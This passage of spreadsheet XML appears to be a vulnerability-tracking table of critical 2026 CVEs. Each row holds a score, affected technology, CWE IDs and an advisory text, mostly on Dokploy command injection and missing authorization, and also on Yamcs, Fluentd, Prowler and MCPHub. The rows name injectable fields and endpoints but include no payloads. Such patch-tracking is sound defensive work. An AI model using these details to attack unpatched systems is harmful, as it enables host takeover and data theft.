          <t>Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to 1.12.3, {{config.}} placeholders in egg configuration-file templates allow a low-privileged user to read {{config.token}}, {{config.token_id}}, and {{config.docker.registries}} from the full daemon configuration. This issue is fixed in version 1.12.3.</t>
        </is>
      </c>
      <c r="M24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52855</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54680</t>
        </is>
      </c>
      <c r="C25" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E25" s="5" t="inlineStr"/>
      <c r="F25" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G25" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr">
        <is>
          <t>2026-07-29</t>
        </is>
      </c>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>Logging operator automates the deployment and configuration of Kubernetes logging pipelines. Prior to 6.6.0, the Fluentd configuration renderer FluentRender in pkg/sdk/logging/model/render/fluent.go writes CRD strings such as Flow record_transformer.records values directly into fluent.conf without escaping, allowing a user who can create Flow resources to inject a Fluentd &lt;match **&gt; block using @type exec and execute arbitrary commands inside the Fluentd aggregator. This issue is fixed in version 6.6.0.</t>
        </is>
      </c>
      <c r="M25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54680</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55565</t>
        </is>
      </c>
      <c r="C26" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E26" s="5" t="inlineStr"/>
      <c r="F26" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G26" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs LikeExpression.fillCode_getValueReturn in yamcs-core/src/main/java/org/yamcs/yarch/streamsql/LikeExpression.java inserts an unescaped LIKE pattern into Java source compiled by Expression.getCompiledExpression through SimpleCompiler.cook instead of applying ValueExpression.escapeJavaString. The pattern can originate from POST /api/archive/{instance}:executeSql, POST /api/archive/{instance}:streamSql, POST /api/archive/{instance}/tables/{table}:readRows, GET /api/archive/{instance}/events, or activity searches, including paths available with ReadTables, ReadEvents, or ReadActivities. A quote in the pattern can inject Java that runs as the Yamcs server process. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55565</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65818</t>
        </is>
      </c>
      <c r="C27" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E27" s="5" t="inlineStr"/>
      <c r="F27" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G27" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H27" s="5" t="inlineStr">
        <is>
          <t>microsoft:power_platform</t>
        </is>
      </c>
      <c r="I27" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Power Automate allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65818</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72736</t>
        </is>
      </c>
      <c r="C28" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E28" s="5" t="inlineStr"/>
      <c r="F28" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G28" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy passes user-controlled values directly into shell commands via unquoted template literal interpolation in the registry credential testing and Docker Swarm cluster management endbpoints. Both endpoints have a safe local code path (using execFileAsync or the Docker API) but a vulnerable remote path (using execAsyncRemote which runs the shell string via SSH). This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72736</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72862</t>
        </is>
      </c>
      <c r="C29" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E29" s="5" t="inlineStr"/>
      <c r="F29" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G29" s="5" t="inlineStr">
        <is>
          <t>docker, mysql, redis</t>
        </is>
      </c>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the mariadb.ts, mongo.ts, mysql.ts, postgres.ts, redis.ts, and libsql.ts Dokploy database service deployment functions pass user-controlled dockerImage fields unquoted into docker pull ${dockerImage} shell commands on the remote-server code path. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72862</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72863</t>
        </is>
      </c>
      <c r="C30" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E30" s="5" t="inlineStr"/>
      <c r="F30" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G30" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy's WebSocket handlers (in-app terminals and log streamers) authenticate the session but never authorize it. They establish who the user is via validateRequest() and then proceed without consulting the role/permission model that every tRPC procedure enforces. Any authenticated member, can therefore open an interactive shell into any container on the host, including the dokploy container that mounts the Docker socket, and from there obtain root on the host, escaping the application and crossing every tenant boundary. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72863</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72864</t>
        </is>
      </c>
      <c r="C31" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E31" s="5" t="inlineStr"/>
      <c r="F31" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G31" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the local branch of /docker-container-terminal in apps/dokploy/server/wss/docker-container-terminal.ts authenticates with validateRequest but does not authorize the attacker-controlled containerId against the caller's role, organization, or service access before passing it to `docker exec`, allowing any authenticated member to obtain a root shell in arbitrary containers on a self-hosted instance. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72864</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72865</t>
        </is>
      </c>
      <c r="C32" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E32" s="5" t="inlineStr"/>
      <c r="F32" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G32" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the compose.update operation stores an unvalidated composePath that packages/server/src/utils/builders/compose.ts and packages/server/src/services/compose.ts interpolate into docker compose -f, docker stack deploy -c, and touch shell commands executed through /bin/sh -c. An authenticated member with compose write and deploy permission can supply a crafted composePath, trigger compose.deploy or startCompose, and execute arbitrary operating-system commands in the Docker-privileged Dokploy host context. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72865</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72867</t>
        </is>
      </c>
      <c r="C33" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E33" s="5" t="inlineStr"/>
      <c r="F33" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G33" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-602, CWE-78</t>
        </is>
      </c>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). From 0.29.3 until 0.29.13, the incomplete fix for CVE-2026-45628 leaves packages/server/src/db/schema/compose.ts branch fields without server-side validation, allowing a direct compose.update request to store a malicious customGitBranch, branch, gitlabBranch, bitbucketBranch, or giteaBranch. A low-privileged authenticated user can trigger compose.deploy, which passes the stored branch to shell-based Git clone commands in packages/server/src/utils/providers/git.ts, github.ts, gitlab.ts, bitbucket.ts, and gitea.ts, resulting in arbitrary host command execution. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72867</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72868</t>
        </is>
      </c>
      <c r="C34" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E34" s="5" t="inlineStr"/>
      <c r="F34" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G34" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-862</t>
        </is>
      </c>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, apps/dokploy/server/api/routers/destination.ts interpolates the accessKey, secretAccessKey, region, endpoint, provider, and bucket fields from destination.testConnection into an rclone ls command executed through child_process.exec. The `withPermission("destination", "create")` path permits a low-privileged organization member to reach the mutation, close a quoted argument with a crafted field, and execute arbitrary commands in the root Dokploy container, which has access to the host Docker socket. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72868</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72869</t>
        </is>
      </c>
      <c r="C35" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E35" s="5" t="inlineStr"/>
      <c r="F35" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G35" s="5" t="inlineStr">
        <is>
          <t>docker, node.js, postgresql, mysql, mongodb</t>
        </is>
      </c>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the backup.restoreBackupWithLogs tRPC subscription passes the databaseName parameter to restore builders in packages/server/src/utils/restore/utils.ts, where PostgreSQL, MariaDB, MySQL, and MongoDB commands embed the value in nested shell text executed by Node.js exec. An authenticated user with backup:restore permission can supply a crafted databaseName that the host /bin/sh expands before docker exec, resulting in arbitrary commands running in the Docker-privileged host context. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72869</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72876</t>
        </is>
      </c>
      <c r="C36" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E36" s="5" t="inlineStr"/>
      <c r="F36" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G36" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-78, CWE-862</t>
        </is>
      </c>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, swarm.getNodes, swarm.getNodeInfo, swarm.getNodeApps, and swarm.getAppInfos in apps/dokploy/server/api/routers/swarm.ts accept another organization’s serverId without an activeOrganizationId ownership check, and getNodeInfo in packages/server/src/services/docker.ts interpolates nodeId into execAsyncRemote, allowing a caller with server:read permission to execute arbitrary commands as the configured SSH user on another tenant’s server. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72876</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72901</t>
        </is>
      </c>
      <c r="C37" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E37" s="5" t="inlineStr"/>
      <c r="F37" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G37" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy allows an authenticated low-privilege member to execute arbitrary commands on the control-plane host because the volumeName field accepted by volumeBackup.create and volumeBackup.runManually is interpolated without quoting in packages/server/src/utils/volume-backups/backup.ts and executed through child_process.exec, with Docker socket access making execution host/root-equivalent. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72901</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72902</t>
        </is>
      </c>
      <c r="C38" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E38" s="5" t="inlineStr"/>
      <c r="F38" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G38" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy allows an authenticated user to execute arbitrary commands on a local or SSH-connected target server because registry.testRegistry and registry.testRegistryById in apps/dokploy/server/api/routers/registry.ts interpolate the password field into an execAsyncRemote shell command instead of using safeDockerLoginCommand. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72902</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73263</t>
        </is>
      </c>
      <c r="C39" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E39" s="5" t="inlineStr"/>
      <c r="F39" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G39" s="5" t="inlineStr">
        <is>
          <t>kubernetes, python</t>
        </is>
      </c>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>Prowler is a cloud security platform. Prior to 5.36.0, the Kubernetes provider connection test accepted kubeconfig_content containing a legacy gcp auth-provider with config.cmd-path and config.cmd-args because kubeconfig_contains_exec_auth in api/src/backend/api/v1/serializers.py checked only exec blocks, and POST /api/v1/providers/{id}/connection loaded it through config.load_kube_config_from_dict in prowler/providers/kubernetes/kubernetes_provider.py, causing kubernetes-python CommandTokenSource.token to run the attacker-supplied command through subprocess.Popen on the shared worker. This issue is fixed in version 5.36.0.</t>
        </is>
      </c>
      <c r="M39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73263</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79748</t>
        </is>
      </c>
      <c r="C40" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E40" s="5" t="inlineStr"/>
      <c r="F40" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G40" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 0.12.15, the POST /api/servers and PUT /api/servers/:name endpoints in MCPHub create/update MCP server configurations and then immediately spawn the configured stdio process via child_process.spawn. Authentication is required, but there is no authorization check restricting these endpoints to admins, and there is no allowlist/sanitization on the command and args fields. As a result, any authenticated non-admin user can submit a server configuration with command:"/bin/sh" (or any other binary) and arbitrary args, causing MCPHub to execute the attacker-controlled process as the MCPHub server's OS user (commonly root in the published Docker image and in npx/systemd deployments). This issue has been patched in version 0.12.15.</t>
        </is>
      </c>
      <c r="M40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79748</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86464</t>
        </is>
      </c>
      <c r="C41" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E41" s="5" t="inlineStr"/>
      <c r="F41" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G41" s="5" t="inlineStr">
        <is>
          <t>kubernetes, docker, postgresql</t>
        </is>
      </c>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>In the current development version of Eclipse aeriOS, for which no official release has yet been published, the Identity Manager (IdM) deployment included insecure default configurations and credentials for security-sensitive services.
The Helm chart exposed the Keycloak service and its PostgreSQL backing database through Kubernetes NodePort services by default, while the Docker Compose deployment similarly exposed PostgreSQL on all network interfaces. The deployment included fixed default credentials for the Keycloak administrator and PostgreSQL database user, and the previous Helm chart configuration did not provide adequate secret management for these credentials. In addition, predefined application users with known credentials were provided for development and testing without sufficiently warning operators against their use in production environments.
An attacker able to reach the exposed services could use the published default credentials to obtain administrative access to the Identity Manager or direct access to its database. This could allow unauthorized access to or modification of identity-management data, including users, roles, client credentials, sessions, and cryptographic material, and could enable the creation of privileged identities or tokens accepted by other aeriOS components.
The issue has been addressed by generating a random Keycloak administrator password by default, managing Keycloak and PostgreSQL credentials through Kubernetes Secrets, and restricting PostgreSQL to an internal service in both the Helm chart and Docker Compose deployment. OpenLDAP is also restricted to an internal service. The predefined users intended for development and testing are retained, but the documentation now explicitly warns that their default credentials must not be used in production and that these users should be removed or their credentials changed after installation.</t>
        </is>
      </c>
      <c r="M41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13447</t>
        </is>
      </c>
      <c r="C42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E42" s="5" t="inlineStr"/>
      <c r="F42" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G42" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>The Mstore Api plugin for WordPress is vulnerable to Authentication Bypass via JWT Forgery in versions up to, and including, 4.20.0 This is due to missing cryptographic signature verification in the FirebasePhoneAuthHelper::verify_id_token() function, which decodes and validates Firebase ID token claims (alg, kid, aud, iss) but never calls openssl_verify() or any equivalent to validate the JWT signature against Google's actual public key certificates. This makes it possible for unauthenticated attackers to forge a Firebase Phone Auth JWT signed with a self-generated RSA key pair and impersonate any phone number, resulting in unauthorized access to existing WordPress accounts or creation of new arbitrary accounts.</t>
        </is>
      </c>
      <c r="M42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13447</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18221</t>
        </is>
      </c>
      <c r="C43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E43" s="5" t="inlineStr"/>
      <c r="F43" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G43" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H43" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I43" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J43" s="5" t="inlineStr"/>
